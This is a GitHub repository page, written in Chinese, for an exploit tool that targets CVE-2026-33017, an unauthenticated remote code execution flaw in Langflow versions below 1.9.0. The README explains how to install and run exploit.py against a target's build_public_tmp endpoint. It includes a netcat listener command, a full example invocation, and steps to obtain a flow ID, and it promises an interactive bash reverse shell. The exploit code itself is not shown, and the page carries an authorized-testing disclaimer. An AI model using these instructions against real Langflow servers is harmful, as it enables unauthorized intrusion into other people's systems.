diamorphine666/CVE-2026-33017-Exploit
GitHub: diamorphine666/CVE-2026-33017-Exploit
针对 Langflow <1.9.0 未授权 RCE 漏洞(CVE-2026-33017)的自动化利用工具,通过 build_public_tmp 端点实现反弹 shell。
Stars: 0 | Forks: 0
# Fireflow RCE Exploit
通过 `build_public_tmp` endpoint 实现的 Langflow 远程代码执行。
通过 Public Flow Build endpoint 利用,在目标上执行反弹 shell。
## 环境要求
- Python 3.8+
- `httpx` 库
安装:
```
pip install httpx
```
## 用法
```
python exploit.py -u -l -p --flow-id --client-id
```
### 参数
- `-u, --url` :Langflow 实例的 Base URL(例如:https://flow.example.com/)
- `-l, --lhost` :用于接收反弹 shell 的 IP 地址
- `-p, --lport` :反弹 shell 的监听端口
- `-f --flow-id` :目标 flow ID(必填 – 从 /api/v1/flows/ 或 UI 中获取)
- `-c --client-id` :用于 session 识别的 `client_id` cookie 值
## 示例
1. 启动一个监听器:
nc -nlvp 9001
2. 运行 exploit:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
3. 如果成功,你将获得一个交互式的 bash shell。
## 重要提示
- ReadTimeout 是正常现象 – 由于 shell 阻塞了 HTTP 请求,服务器可能不会做出响应。只要你在监听器上看到连接,就说明 exploit 已成功执行。
- 需要提供有效的 `flow-id`。可通过 GET /api/v1/flows/ 列出所有 flow,或从浏览器 URL 中复制。
- 本工具仅供授权的渗透测试和教育目的使用。未经明确许可,请勿对系统使用。
## 受影响版本
- 修复自定义组件 RCE 之前的 Langflow 版本 <1.9.0
## License
MIT – 仅供教育和道德安全研究使用。
标签:CISA项目, Python, 威胁模拟, 无后门, 编程工具, 运行时操纵, 远程代码执行, 逆向工具